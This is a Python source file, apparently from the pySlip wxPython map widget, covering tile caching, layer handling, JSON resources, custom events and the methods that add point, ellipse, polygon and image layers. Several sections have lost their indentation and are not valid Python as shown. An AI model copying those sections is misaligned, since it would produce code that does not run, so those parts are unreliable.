        def disable_event(*pargs, **kwargs):
            pass  # the sauce, please
        self.Bind(wx.EVT_ERASE_BACKGROUND, disable_event)

        # set callback upon onSize event (hook for subclasses/owners)
        self.onSizeCallback = None

    def Draw(self, dc):
        """Stub: called when the canvas needs to be re-drawn.

        Subclasses override this to render into the supplied device context.
        """
        pass

    def Update(self):
        """Causes the canvas to be updated.

        Redraws into the buffer via Draw(); the BufferedDC copies the
        result to the screen when it goes out of scope.
        """
        dc = wx.BufferedDC(wx.ClientDC(self), self.buffer)
        # Begin/EndDrawing existed in wxPython 3 and were removed in 4
        if WX3:
            dc.BeginDrawing()
        dc.Clear()
        self.Draw(dc)
        if WX3:
            dc.EndDrawing()

    def OnPaint(self, event):
        """Paint the canvas to the screen."""
        # Blit the front buffer to the screen
        wx.BufferedPaintDC(self, self.buffer)

    def OnSize(self, event=None):
        """Create a new off-screen buffer to hold drawn data."""
        (width, height) = self.GetClientSizeTuple() if WX3 else self.GetClientSize()
        # clamp to 1x1 - a zero-dimension bitmap is invalid
        if width == 0:
            width = 1
        if height == 0:
            height = 1
        # NOTE(review): wx.EmptyBitmap is deprecated in wxPython 4 (Phoenix);
        # wx.Bitmap(width, height) is the replacement - confirm target version.
        self.buffer = wx.EmptyBitmap(width, height)

        self.view_width = width
        self.view_height = height

        # call onSize callback, if registered
        if self.onSizeCallback:
            self.onSizeCallback()

        # Now update the screen
        self.Update()
######
# Base class for a tile object - handles access to tiles.
######
class _Tiles(object):
    """An object to handle a pyslip tiles directory.

    The directory layout is: <tile_dir>/tile.info (pickled metadata), one
    two-digit sub-directory per zoom level (each with its own tile.info),
    and a missing_tile.png fallback image.

    Uses 'elephant' caching - it never forgets!
    TODO: Add more sophisticated limit + 'drop LRU' caching.
    """

    # the name of the tile info file (under the main tile dir)
    TileInfoFilename = 'tile.info'

    # expected form of individual tile level directories (2 decimal digits)
    TileFilenameTemplate = '[0-9][0-9]'

    # name of picture file to use if tile missing (under the main tile dir)
    MissingTileFilename = 'missing_tile.png'

    # maximum number of tiles held in each level cache
    MaxTileList = 4096

    def __init__(self, tile_dir):
        """Initialise a Tiles instance.

        tile_dir  root directory of tiles

        Raises Exception if tile_dir lacks a readable 'tile.info' file.
        """
        # open top-level info file
        self.tile_dir = tile_dir
        info_file = os.path.join(tile_dir, self.TileInfoFilename)
        try:
            fd = open(info_file, 'rb')
            (self.extent, self.tile_size,
             self.sea_colour, self.land_colour) = pickle.load(fd)
            fd.close()
        except IOError:
            msg = "'%s' doesn't appear to be a tile directory" % tile_dir
            raise Exception(msg)

        (self.tile_size_x, self.tile_size_y) = self.tile_size

        # get list of tile levels (sub-directories named with two digits)
        tile_mask = os.path.join(tile_dir, self.TileFilenameTemplate)
        self.levels = [int(os.path.basename(l))
                       for l in glob.glob(os.path.join(tile_mask))]

        # setup the per-level tile caches and LRU lists
        self.cache = {}
        self.lru = {}
        for l in self.levels:
            self.cache[l] = {}
            self.lru[l] = []

        # bitmap used for tiles absent from disk; loaded lazily in GetTile()
        self.missing_tile = None

        # set min and max tile levels
        self.min_level = min(self.levels)
        self.max_level = max(self.levels)

    def UseLevel(self, n):
        """Prepare to serve tiles from the required level.

        n  The required level

        Returns a tuple (map_width, map_height, ppd_x, ppd_y) if succesful,
        else None.  The width/height values are pixels.  The ppd_? values are
        pixels-per-degree values for X and Y direction.
        """
        # try to get cache for this level, no cache means no level
        try:
            self.tile_cache = self.cache[n]
            self.tile_list = self.lru[n]
        except KeyError:
            return None

        # get tile info
        info = self.GetInfo(n)
        if info is None:
            return None
        (self.num_tiles_x, self.num_tiles_y, self.ppd_x, self.ppd_y) = info

        # store partial path to level dir
        self.tile_level_dir = os.path.join(self.tile_dir, '%02d' % n)

        return (self.tile_size_x * self.num_tiles_x,
                self.tile_size_y * self.num_tiles_y,
                self.ppd_x, self.ppd_y)

    def GetInfo(self, level):
        """Get tile info for a particular level.

        level  the level to get tile info for

        Returns (num_tiles_x, num_tiles_y, ppd_x, ppd_y), or None if the
        level's info file can't be opened.
        """
        # see if we can open the tile info file.
        info_file = os.path.join(self.tile_dir, '%02d' % level,
                                 self.TileInfoFilename)
        try:
            fd = open(info_file, 'rb')
        except IOError:
            return None

        # OK, looks like we actually do have this level!
        info = pickle.load(fd)
        fd.close()

        return info

    def GetTile(self, x, y):
        """Get bitmap for tile at tile coords (x, y).

        x  X coord of tile required (tile coordinates)
        y  Y coord of tile required (tile coordinates)

        Returns bitmap object containing the tile image.
        Tile coordinates are measured from map top-left.

        If tile is in cache, read from there, else read from file & put
        into cache.  Use LRU cache algorithm to limit memory usage.
        """
        try:
            # if tile in cache, use it; its LRU entry is removed here and
            # re-inserted at the front below
            pic = self.tile_cache[(x, y)]
            index = self.tile_list.index((x, y))
            del self.tile_list[index]
        except KeyError:
            # tile *not* in cache: get image, cache and return it
            img_name = os.path.join(self.tile_level_dir,
                                    'tile_%d_%d.png' % (x, y))

            # load tile as not in cache
            if not os.path.exists(img_name):
                # tile not there, use 'missing tile'
                if not self.missing_tile:
                    # load missing tile (lazily, first time it's needed)
                    img_name = os.path.join(self.tile_dir,
                                            self.MissingTileFilename)
                    img = wx.Image(img_name, wx.BITMAP_TYPE_ANY)
                    self.missing_tile = img.ConvertToBitmap()
                # NOTE(review): this path does not add (x, y) to tile_cache,
                # yet the key is inserted into tile_list below - a later LRU
                # eviction of that key would raise KeyError; confirm intent.
                pic = self.missing_tile
            else:
                # new tile, check if we must drop old tiles - LRU
                # remove oldest index at last element, then delete from dict
                if len(self.tile_list) > self.MaxTileList:
                    drop_element = self.tile_list.pop()
                    del self.tile_cache[drop_element]

                # we have the tile file - read into memory, cache & return
                img = wx.Image(img_name, wx.BITMAP_TYPE_ANY)
                pic = img.ConvertToBitmap()
                self.tile_cache[(x, y)] = pic

        # most-recently-used entry goes to the front of the LRU list
        self.tile_list.insert(0, (x, y))

        return pic
######
# A layer class - encapsulates all layer data.
######
class _Layer(object):
"""A Layer object."""
DefaultDelta = 5 # default selection delta
def __init__(self, id=0, painter=None, data=None, map_rel=True,
visible=False, show_levels=None, selectable=False,
name="<no name given>", type=None):
"""Initialise the Layer object.
id unique layer ID
painter render function
data the layer data
map_rel True if layer is map-relative, else layer-relative
visible layer visibility
show_levels list of levels at which to auto-show the level
selectable True if select operates on this layer, Else False
name the name of the layer (for debug)
type a layer 'type' flag
"""
self.painter = painter # routine to draw layer
self.data = data # data that defined the layer
self.map_rel = map_rel # True if layer is map relative
self.visible = visible # True if layer visible
self.show_levels = show_levels # None or list of levels to auto-show
self.selectable = selectable # True if we can select on this layer
self.delta = self.DefaultDelta # minimum distance for selection
self.name = name # name of this layer
self.type = type # type of layer
self.id = id # ID of this layer
def __str__(self):
return ('<pyslip Layer: id=%d, name=%s, map_rel=%s, visible=%s'
% (self.id, self.name, str(self.map_rel), str(self.visible)))
###############################################################################
# A Resource class that abstracts loading/storing resources from/to disk.
###############################################################################
class Resource(object):
    """A class to allow the loading of layer data to/from disk as a resource.

    An instance of Resource has the following attributes/methods:
        .layers        a dictionary of named layer entries
        .AddLayer()    add a layer to the resource
        .GetLayer()    get a layer resource by name
        .GetLayers()   get the whole layers dictionary
        .DeleteLayer() remove a layer by name
        .Read()        read a resource from disk
        .Write()       write resource to disk
    """

    def __init__(self, fname=None):
        """Initialise a Resource object, optionally loading data from disk.

        fname  path to a resource file to read
        """
        # set default attributes
        self.layers = {}
        self.filename = fname

        if fname:
            self.Read(fname)

    def Read(self, fname):
        """Read a resource from disk.

        fname  path to file to read

        fname overwrites self.filename.

        Raises IOError if the file cannot be opened.
        """
        self.filename = fname

        import json
        try:
            # context manager guarantees the file handle is closed
            with open(fname) as fd:
                self.layers = json.load(fd)
        except IOError as e:
            msg = 'Error opening %s: %s' % (fname, str(e))
            raise IOError(msg)

    def Write(self, fname=None):
        """Write the Resource to disk.

        fname  path to file to write (default is to use self.filename)

        If fname is supplied, it overwrites self.filename.

        Raises Exception if no filename is known.
        """
        if fname:
            self.filename = fname
        if not self.filename:
            raise Exception('Write() called but no filename supplied')

        import json
        # FIX: open in text mode ('w'), not 'wb' - json.dump() writes str
        # objects, which fails on a binary-mode file under Python 3.
        with open(self.filename, 'w') as fd:
            json.dump(self.layers, fd, ensure_ascii=False,
                      indent=2, separators=(',', ':'))

    def AddLayer(self, name, layer_type, data):
        """Add a layer to the Resource.

        name        name of the layer
        layer_type  type of the layer
        data        layer data
        """
        self.layers[name] = (layer_type, data)

    def GetLayers(self):
        """Get layers object.

        Returns a dict: {'layer_name': (layer_type, data), ...}
        (entries loaded from disk come back as lists, as JSON has no
        tuple type)
        """
        return self.layers

    def GetLayer(self, name):
        """Get a layer by name.

        name  name of the layer to get

        Returns a tuple (layer_type, data), or None if not found.
        """
        return self.layers.get(name, None)

    def DeleteLayer(self, name):
        """Delete a layer by name; an unknown name is silently ignored.

        name  name of the layer to delete
        """
        # pop() with a default replaces the try/del/except KeyError dance
        self.layers.pop(name, None)

    def __len__(self):
        """Makes len(Resource) return number of layers held."""
        return len(self.layers)
###############################################################################
# The wxPython pySlip widget events.
# define the events that are raised by the pySlip widget
###############################################################################
# point/box select (left mouse button); the '1' tells wx.PyEventBinder the
# binder expects a single widget id
_myEVT_PYSLIP_SELECT = wx.NewEventType()
EVT_PYSLIP_SELECT = wx.PyEventBinder(_myEVT_PYSLIP_SELECT, 1)

# point RIGHT select (right mouse button)
_myEVT_PYSLIP_RIGHTSELECT = wx.NewEventType()
EVT_PYSLIP_RIGHTSELECT = wx.PyEventBinder(_myEVT_PYSLIP_RIGHTSELECT, 1)

# level (zoom) change
_myEVT_PYSLIP_LEVEL = wx.NewEventType()
EVT_PYSLIP_LEVEL = wx.PyEventBinder(_myEVT_PYSLIP_LEVEL, 1)

# mouse geo position change
_myEVT_PYSLIP_POSITION = wx.NewEventType()
EVT_PYSLIP_POSITION = wx.PyEventBinder(_myEVT_PYSLIP_POSITION, 1)
class _PySlipEvent(wx.PyCommandEvent):
    """Event sent from the pySlip widget.

    Carries no payload of its own; the code that posts the event attaches
    whatever attributes the handler needs.
    """

    def __init__(self, eventType, id):
        """Construct a PySlip event.

        eventType  type of event (one of the _myEVT_PYSLIP_* type codes)
        id         unique event number

        Event will be adorned with attributes by raising code.
        """
        wx.PyCommandEvent.__init__(self, eventType, id)
###############################################################################
# The wxPython pySlip widget proper
###############################################################################
class PySlip(_BufferedCanvas):
"""A widget to display a tiled map, a la Google maps."""
# keep a temporary list of placement dictionaries for later compilation
placements = []
# dictionary for map-relative image placement
# assumes variables x, y, w, h, w2, h2, x_off & y_off are set
# perturbs x and y to top-left image corner for placing
image_map_placement = {'cc': 'x=x-w2+x_off; y=y-h2+y_off',
'nw': 'x=x+x_off; y=y+y_off',
'cn': 'x=x-w2+x_off; y=y+y_off',
'ne': 'x=x-w+x_off; y=y+y_off',
'ce': 'x=x-w+x_off; y=y-h2+y_off',
'se': 'x=x-w+x_off; y=y-h+y_off',
'cs': 'x=x-w2+x_off; y=y-h+y_off',
'sw': 'x=x+x_off; y=y-h+y_off',
'cw': 'x=x+x_off; y=y-h2+y_off'}
placements.append(image_map_placement)
# dictionary for view-relative image placement
# assumes variables x, y, w, h, dc_w, dc_h, x_off, y_off are set
# perturbs x and y to top-left image corner for drawing
image_view_placement = {'cc': 'x=dc_w2-w2; y=dc_h2-h2',
'nw': 'x=x_off; y=y_off',
'cn': 'x=dc_w2-w2; y=y_off',
'ne': 'x=dc_w-w-x_off; y=y_off',
'ce': 'x=dc_w-w-x_off; y=dc_h2-h2',
'se': 'x=dc_w-w-x_off; y=dc_h-h-y_off',
'cs': 'x=dc_w2-w2; y=dc_h-h-y_off',
'sw': 'x=x_off; y=dc_h-h-y_off',
'cw': 'x=x_off; y=dc_h2-h2'}
placements.append(image_view_placement)
# map-relative text placement dictionary
# assumes variables x, y, w, h, dc_w, dc_h, x_off, y_off are set
# w and h are text width and height
# perturbs x and y to correct values for the placement
text_map_placement = {'cc': 'x=x-w2; y=y-h2',
'nw': 'x=x+x_off; y=y+y_off',
'cn': 'x=x-w2; y=y+y_off',
'ne': 'x=x-w-x_off; y=y+y_off',
'ce': 'x=x-w-x_off; y=y-h2',
'se': 'x=x-w-x_off; y=y-h-y_off',
'cs': 'x=x-w2; y=y-h-y_off',
'sw': 'x=x+x_off; y=y-h-y_off',
'cw': 'x=x+x_off; y=y-h2'}
placements.append(text_map_placement)
# view-relative text placement dictionary
# assumes variables x, y, w, h, dc_w, dc_h, x_off, y_off are set
# w and h are text width and height
# perturbs x and y to correct values for the placement
text_view_placement = {'cc': 'x=x+dc_w2-w2; y=y+dc_h2-h2',
'nw': 'x=x; y=y',
'cn': 'x=x+dc_w2-w2; y=y',
'ne': 'x=x+dc_w-w; y=y',
'ce': 'x=x+dc_w-w; y=y+dc_h2-h2',
'se': 'x=x+dc_w-w; y=y+dc_h-h',
'cs': 'x=x+dc_w2-w2; y=y+dc_h-h',
'sw': 'x=x; y=y+dc_h-h',
'cw': 'x=x; y=y+dc_h2-h2'}
placements.append(text_view_placement)
# view-relative polygon placement dictionary
# assumes variables x, y, dc_w, dc_h, x_off, y_off are set
# perturbs x and y to correct values for the placement
poly_view_placement = {'cc': 'x=x+dc_w2; y=y+dc_h2',
'nw': 'x=x+x_off; y=y+y_off',
'cn': 'x=x+dc_w2; y=y+y_off',
'ne': 'x=x+dc_w-x_off; y=y+y_off',
'ce': 'x=x+dc_w-x_off; y=y+dc_h2-y_off',
'se': 'x=x+dc_w-x_off; y=y+dc_h-y_off',
'cs': 'x=x+dc_w2; y=y+dc_h-y_off',
'sw': 'x=x+x_off; y=y+dc_h-y_off',
'cw': 'x=x+x_off; y=y+dc_h2'}
placements.append(poly_view_placement)
# dictionary for view-relative point placement
# assumes variables x, y, dc_w, dc_h, x_off, y_off are set
# perturbs x and y to point centre for drawing
point_view_placement = {'cc': 'x=x+dc_w2; y=y+dc_h2',
'nw': 'x=x+x_off; y=y+y_off',
'cn': 'x=x+dc_w2; y=y+y_off',
'ne': 'x=x+dc_w-x_off; y=y+y_off',
'ce': 'x=x+dc_w-x_off; y=y+dc_h2',
'se': 'x=x+dc_w-x_off; y=y+dc_h-y_off',
'cs': 'x=x+dc_w2; y=y+dc_h-y_off',
'sw': 'x=x+x_off; y=y+dc_h-y_off',
'cw': 'x=x+x_off; y=y+dc_h2'}
placements.append(point_view_placement)
# now pre-compile all the placement string dictionaries
for p_dict in placements:
for key in p_dict:
p_dict[key] = compile(p_dict[key], 'string', 'exec')
del placements
# panel background colour
BackgroundColour = wx.WHITE
# default text attributes - map relative
DefaultTextPlacement = 'se'
DefaultTextRadius = 2
DefaultTextColour = wx.BLACK
DefaultTextTextColour = wx.BLACK
DefaultTextOffsetX = 5
DefaultTextOffsetY = 1
DefaultTextFontname = 'ArialMT'
DefaultTextFontSize = 9
DefaultTextData = None
# default text attributes - view relative
DefaultTextViewPlacement = 'se'
DefaultTextViewRadius = 0
DefaultTextViewColour = wx.BLACK
DefaultTextViewTextColour = wx.BLACK
DefaultTextViewOffsetX = 0
DefaultTextViewOffsetY = 0
DefaultTextViewFontname = 'ArialMT'
DefaultTextViewFontSize = 9
DefaultTextViewData = None
# default point attributes
DefaultPointPlacement = 'nw'
DefaultPointRadius = 3
DefaultPointColour = wx.RED
DefaultPointOffsetX = 0
DefaultPointOffsetY = 0
DefaultPointData = None
# default image attributes
DefaultImagePlacement = 'cc'
DefaultImageRadius = 0
DefaultImageColour = wx.BLACK
DefaultImageOffsetX = 0
DefaultImageOffsetY = 0
# default polygon attributes
DefaultPolygonPlacement = 'cc'
DefaultPolygonWidth = 1
DefaultPolygonColour = wx.RED
DefaultPolygonClose = False
DefaultPolygonFilled = False
DefaultPolygonFillcolour = 'blue'
DefaultPolygonOffsetX = 0
DefaultPolygonOffsetY = 0
# layer type values
TypePoint = 0
TypeImage = 1
TypePolygon = 2
TypeText = 3
TypeEllipse = 4
    def __init__(self, parent, tile_dir=None, start_level=None,
                 min_level=None, max_level=None, **kwargs):
        """Initialise a pySlip instance.
        parent       reference to parent object
        tile_dir     the root tile directory
        start_level  initial tile level to start at
        min_level    the minimum tile level to use
        max_level    the maximum tile level to use
        **kwargs     keyword args for Panel
        """
        # create and initialise the base panel
        _BufferedCanvas.__init__(self, parent=parent, **kwargs)
        self.SetBackgroundColour(PySlip.BackgroundColour)
        # get tile info
        # caller-supplied level limits override those of the tileset
        self.tiles = _Tiles(tile_dir)
        if max_level:
            self.max_level = max_level
        else:
            self.max_level = self.tiles.max_level
        if min_level:
            self.min_level = min_level
        else:
            self.min_level = self.tiles.min_level
        if start_level:
            self.level = start_level
        else:
            self.level = self.min_level
        self.tile_size_x = self.tiles.tile_size_x
        self.tile_size_y = self.tiles.tile_size_y
        # set some internal state
        self.view_width = None              # view size in pixels
        self.view_height = None
        self.ppd_x = 0                      # pixel_per_degree for current tileset
        self.ppd_y = 0
        self.view_offset_x = 0              # pixel offset at left & top of view
        self.view_offset_y = 0
        self.NS_wrap = False                # disallow wraparound N-S
        self.EW_wrap = False                # disallow wraparound E-W
        self.view_llon = self.view_rlon = None      # view limits
        self.view_tlat = self.view_blat = None
        self.was_dragging = False           # True if dragging map
        self.move_dx = 0                    # drag delta values
        self.move_dy = 0
        self.last_drag_x = None             # previous drag position
        self.last_drag_y = None
        self.ignore_next_up = False         # ignore next LEFT UP event
        self.ignore_next_right_up = False   # ignore next RIGHT UP event
        self.is_box_select = False          # True if box selection
        self.sbox_1_x = self.sbox_1_y = None        # box size
        # layer stuff
        self.next_layer_id = 1              # source of unique layer IDs
        self.layer_z_order = []             # layer Z order, contains layer IDs
        self.layer_mapping = {}             # maps layer ID to layer data
        # True if we send event to report mouse position in view
        self.mouse_position_event = True
        # True if event on right mouse click (right button up event)
        self.right_click_event = False
        # True if we send event on level change
        self.change_level_event = True
        # set up dispatch dictionary for layer select handlers
        # (keyed by the Type* layer type constants)
        # for point select
        self.layerPSelHandler = {self.TypePoint: self.GetNearestPointInLayer,
                                 self.TypeImage: self.GetNearestImageInLayer,
                                 self.TypePolygon:
                                     self.GetNearestPolygonInLayer,
                                 self.TypeText: self.GetNearestTextInLayer}
        # for box select
        self.layerBSelHandler = {self.TypePoint: self.GetBoxSelPointsInLayer,
                                 self.TypeImage: self.GetBoxSelImagesInLayer,
                                 self.TypePolygon:
                                     self.GetBoxSelPolygonsInLayer,
                                 self.TypeText: self.GetBoxSelTextsInLayer}
        # bind event handlers
        self.Bind(wx.EVT_MOTION, self.OnMove)
        self.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)
        self.Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDClick)
        self.Bind(wx.EVT_LEFT_UP, self.OnLeftUp)
        self.Bind(wx.EVT_MIDDLE_DOWN, self.OnMiddleDown)
        self.Bind(wx.EVT_MIDDLE_UP, self.OnMiddleUp)
        self.Bind(wx.EVT_RIGHT_DOWN, self.OnRightDown)
        self.Bind(wx.EVT_RIGHT_DCLICK, self.OnRightDClick)
        self.Bind(wx.EVT_RIGHT_UP, self.OnRightUp)
        self.Bind(wx.EVT_MOUSEWHEEL, self.OnMouseWheel)
        self.Bind(wx.EVT_ENTER_WINDOW, self.OnEnterWindow)
        self.Bind(wx.EVT_LEAVE_WINDOW, self.OnLeaveWindow)
        # OK, use the tile level the user wants
        self.ZoomToLevel(self.level)
        # set callback when parent resizes
        self.onSizeCallback = self.ResizeCallback
        # force a resize, which sets up the rest of the state
        self.OnSize()
def OnEnterWindow(self, event):
"""Event handler when mouse enters widget."""
pass
def OnLeaveWindow(self, event):
"""Event handler when mouse leaves widget."""
self.RaiseMousePositionEvent(None)
######
# "add a layer" routines
######
def AddPointLayer(self, points, map_rel=True, visible=True,
show_levels=None, selectable=False,
name='<points_layer>', update=True, **kwargs):
"""Add a layer of points.
points iterable of point data:
(x, y, [attributes])
where x & y are either lon&lat (map) or x&y (view) coords
and attributes is an optional dictionary of attributes for
each point with keys like:
'placement' a placement string
'radius' radius of point in pixels
'colour' colour of point
'offset_x' X offset
'offset_y' Y offset
'data' point data object
map_rel points are map relative if True, else view relative
visible True if the layer is to be immediately visible
show_levels list of levels at which layer is auto-shown (or None)
selectable True if select operates on this layer
name the 'name' of the layer - mainly for debug
kwargs a layer-specific attributes dictionary, has keys:
'placement' a placement string
'radius' radius of point in pixels
'colour' colour of point
'offset_x' X offset
'offset_y' Y offset
'data' point data object
"""
# get global values
default_placement = kwargs.get('placement',
self.DefaultPointPlacement)
default_radius = kwargs.get('radius', self.DefaultPointRadius)
default_colour = self.get_i18n_kw(kwargs, ('colour', 'color'),
self.DefaultPointColour)
default_offset_x = kwargs.get('offset_x', self.DefaultPointOffsetX)
default_offset_y = kwargs.get('offset_y', self.DefaultPointOffsetY)
default_data = kwargs.get('data', self.DefaultPointData)
# create data iterable for draw method
draw_data = [] # list to hold draw data
for pt in points:
if len(pt) == 3:
(x, y, attributes) = pt
elif len(pt) == 2:
(x, y) = pt
attributes = {}
else:
msg = ('Points data must be iterable of tuples: '
'(x, y, [dict])\n'
'Got: %s' % str(pt))
raise Exception(msg)
# plug in any required layer defaults (override globals)
placement = attributes.get('placement', default_placement)
radius = attributes.get('radius', default_radius)
colour = self.get_i18n_kw(attributes, ('colour', 'color'),
default_colour)
offset_x = attributes.get('offset_x', default_offset_x)
offset_y = attributes.get('offset_y', default_offset_y)
data = attributes.get('data', default_data)
draw_data.append((x, y, placement.lower(),
radius, colour, offset_x, offset_y, data))
return self.AddLayer(kwargs.get("renderer",self.DrawPointLayer), draw_data, map_rel,
visible=visible, show_levels=show_levels,
selectable=selectable, name=name,
type=self.TypePoint, update=update)
    def AddEllipseLayer(self, data, map_rel=True, visible=True,
                        show_levels=None, selectable=False,
                        name='<polygon_layer>', update=True, **kwargs):
        """Add a layer of ellipses to the map.

        data         flat sequence of (x, y) vertex tuples, consumed five
                     at a time; each group of five outlines a
                     quadrilateral (presumably with the first vertex
                     repeated as the fifth -- TODO confirm with callers)
                     whose inscribed ellipse is drawn
        map_rel      drawn relative to map if True, else view relative
        visible      True if the layer is to be immediately visible
        show_levels  list of levels at which layer is auto-shown (or None)
        selectable   ignored; the layer is always added non-selectable
        name         name of this layer
        update       True to redraw now if the new layer is visible
        kwargs       layer-wide polygon-style keywords (see AddPolygonLayer)

        Returns the unique ID of the new layer.
        """
        # get global values, if required
        default_placement = kwargs.get('placement',
                                       self.DefaultPolygonPlacement)
        default_width = kwargs.get('width', self.DefaultPolygonWidth)
        default_colour = self.get_i18n_kw(kwargs, ('colour', 'color'),
                                          self.DefaultPolygonColour)
        # NOTE: default_close is computed but not used below; the draw
        # tuples always carry closed=True (an ellipse is always closed)
        default_close = kwargs.get('closed', self.DefaultPolygonClose)
        default_filled = kwargs.get('filled', self.DefaultPolygonFilled)
        default_fillcolour = self.get_i18n_kw(kwargs,
                                              ('fillcolour', 'fillcolor'),
                                              self.DefaultPolygonFillcolour)
        default_offset_x = kwargs.get('offset_x', self.DefaultPolygonOffsetX)
        default_offset_y = kwargs.get('offset_y', self.DefaultPolygonOffsetY)
        draw_data = []
        for x in range(0,len(data),5):
            # Calculate ellipse center, major and minor axes.
            # 'col' appears to be the project's vector type (supports
            # elementwise arithmetic and .elems) -- side1..side4 are the
            # midpoints of the quadrilateral's four edges
            side1=col(( (data[x][0]+data[x+1][0])/2., (data[x][1]+data[x+1][1])/2.))
            side2=col(( (data[x+1][0]+data[x+2][0])/2., (data[x+1][1]+data[x+2][1])/2.))
            side3=col(( (data[x+2][0]+data[x+3][0])/2., (data[x+2][1]+data[x+3][1])/2.))
            side4=col(( (data[x+3][0]+data[x+4][0])/2., (data[x+3][1]+data[x+4][1])/2.))
            ellipse_center = (side1+side3)/2.
            semimajor_axis = side3 - ellipse_center
            semiminor_axis = side2 - ellipse_center
            # store centre plus the two semi-axis end points; the draw
            # routine recovers the axes by subtracting the centre again
            p = (ellipse_center.elems,
                 (semimajor_axis + ellipse_center).elems,
                 (semiminor_axis + ellipse_center).elems)
            draw_data.append((p, default_placement.lower(),
                              default_width, default_colour, True,
                              default_filled, default_fillcolour,
                              default_offset_x, default_offset_y, None))
        return self.AddLayer(self.DrawLightweightEllipticalSpline, draw_data, map_rel,
                             visible, show_levels=show_levels,
                             selectable=False, name=name,
                             type=self.TypeEllipse, update=update)
def DrawLightweightEllipticalSpline(self, dc, data, map_rel):
assert map_rel
# draw polygons on map/view
# Draw points on map/view, using transparency if implemented.
# No point in attempting to recover from the error below,
# because ellipses require a GraphicsContext.
try:
dc = wx.GCDC(dc)
except NotImplementedError:
return
(p, place, width, colour, closed,
filled, fillcolour, x_off, y_off, pdata) = data[0]
dc.SetPen(wx.Pen(colour, width=width))
if filled:
dc.SetBrush(wx.Brush(fillcolour))
else:
dc.SetBrush(wx.TRANSPARENT_BRUSH)
assert closed
assert x_off==0
assert y_off==0
# Ellipses can be convenintly rendered on a graphics context,
# but not on a generic device context.
gc = dc.GetGraphicsContext()
for (p, place, width, colour, closed,
filled, fillcolour, x_off, y_off, pdata) in data:
# Gather ellipse center, major and minor axes in view
# coordinates.
(ellipse_center, semimajor_axis, semiminor_axis) = [
self.ConvertGeo2View(lonlat) for lonlat in p]
major = col(semimajor_axis) - col(ellipse_center)
minor = col(semiminor_axis) - col(ellipse_center)
angle = math.atan2(major.elems[1], major.elems[0])
r_major = math.hypot(major.elems[0], major.elems[1])
r_minor = math.hypot(minor.elems[0], minor.elems[1])
gc.PushState()
gc.Translate(ellipse_center[0], ellipse_center[1])
gc.Rotate(angle)
gc.DrawEllipse(-r_major, -r_minor, 2 * r_major, 2 * r_minor)
gc.PopState()
def AddPolygonLayer(self, data, map_rel=True, visible=True,
show_levels=None, selectable=False,
name='<polygon_layer>', update=True, **kwargs):
"""Add a layer of polygon data to the map.
data iterable of polygon tuples:
(<iter>[, attributes])
where <iter> is another iterable of (x, y) tuples and
attributes is a dictionary of polygon attributes:
placement a placement string (view-relative only)
width width of polygon edge lines
colour colour of edge lines
close if True closes polygon
filled polygon is filled (implies closed)
fillcolour fill colour
offset_x X offset
offset_y Y offset
data polygon data object
map_rel points drawn relative to map if True, else view relative
visible True if the layer is to be immediately visible
show_levels list of levels at which layer is auto-shown (or None)
selectable True if select operates on this layer
name name of this layer
kwargs extra keyword args, layer-specific:
placement placement string (view-rel only)
width width of polygons in pixels
colour colour of polygon edge lines
close True if polygon is to be closed
filled if True, fills polygon
fillcolour fill colour
offset_x X offset
offset_y Y offset
"""
# get global values, if required
default_placement = kwargs.get('placement',
self.DefaultPolygonPlacement)
default_width = kwargs.get('width', self.DefaultPolygonWidth)
default_colour = self.get_i18n_kw(kwargs, ('colour', 'color'),
self.DefaultPolygonColour)
default_close = kwargs.get('closed', self.DefaultPolygonClose)
default_filled = kwargs.get('filled', self.DefaultPolygonFilled)
default_fillcolour = self.get_i18n_kw(kwargs,
('fillcolour', 'fillcolor'),
self.DefaultPolygonFillcolour)
default_offset_x = kwargs.get('offset_x', self.DefaultPolygonOffsetX)
default_offset_y = kwargs.get('offset_y', self.DefaultPolygonOffsetY)
# create draw_data iterable
draw_data = []
for d in data:
if len(d) == 2:
(p, attributes) = d
elif len(d) == 1:
p = d
attributes = {}
else:
msg = ('Polygon data must be iterable of tuples: '
'(poly, [attributes])\n'
'Got: %s' % str(d))
raise Exception(msg)
# get polygon attributes
placement = attributes.get('placement', default_placement)
width = attributes.get('width', default_width)
colour = self.get_i18n_kw(attributes, ('colour', 'color'),
default_colour)
close = attributes.get('closed', default_close)
filled = attributes.get('filled', default_filled)
if filled:
close = True
fillcolour = self.get_i18n_kw(attributes,
('fillcolour', 'fillcolor'),
default_fillcolour)
offset_x = attributes.get('offset_x', default_offset_x)
offset_y = attributes.get('offset_y', default_offset_y)
data = attributes.get('data', None)
# if polygon is to be filled, ensure closed
if close:
p = list(p)
p.append(p[0])
draw_data.append((p, placement.lower(), width, colour, close,
filled, fillcolour, offset_x, offset_y, data))
return self.AddLayer(self.DrawPolygonLayer, draw_data, map_rel,
visible=visible, show_levels=show_levels,
selectable=selectable, name=name,
type=self.TypePolygon, update=update)
def AddImageLayer(self, data, map_rel=True, visible=True,
show_levels=None, selectable=False,
name='<image_layer>', **kwargs):
"""Add a layer of images to the map.
data list of (lon, lat, fname[, attributes]) (map_rel)
or list of (x, y, fname, [attributes]) (view relative)
attributes is a dictionary of attribute keys:
placement a placement string
offset_x X offset
offset_y Y offset
data image data object
map_rel points drawn relative to map if True, else view relative
visible True if the layer is to be immediately visible
show_levels list of levels at which layer is auto-shown (or None)
selectable True if select operates on this layer
name name of this layer
kwargs dictionary of extra params:
placement string describing placement wrt hotspot
offset_x hotspot X offset in pixels
offset_y hotspot Y offset in pixels
The hotspot is placed at (lon, lat) or (x, y). 'placement' controls
where the image is displayed relative to the hotspot.
"""
# get global attribute values
default_placement = kwargs.get('placement',
self.DefaultImagePlacement)
default_offset_x = kwargs.get('offset_x', self.DefaultImageOffsetX)
default_offset_y = kwargs.get('offset_y', self.DefaultImageOffsetY)
# define cache variables for the image data
fname_cache = None
bmp_cache = None
w_cache = None
h_cache = None # used to optimize file access
# load all image files, convert to bitmaps, create draw_data iterable
draw_data = []
for d in data:
if len(d) == 4:
(lon, lat, fname, attributes) = d
elif len(d) == 3:
(lon, lat, fname) = d
attributes = {}
else:
msg = ('Points data must be iterable of tuples: '
'(x, y, [dict])\nGot: %s' % str(d))
raise Exception(msg)
placement = attributes.get('placement', default_placement)
offset_x = attributes.get('offset_x', default_offset_x)
offset_y = attributes.get('offset_y', default_offset_y)
data = attributes.get('data', None)
if fname == fname_cache:
bmap = bmp_cache
w = w_cache
h = h_cache
else:
fname_cache = fname
img = wx.Image(fname, wx.BITMAP_TYPE_ANY)
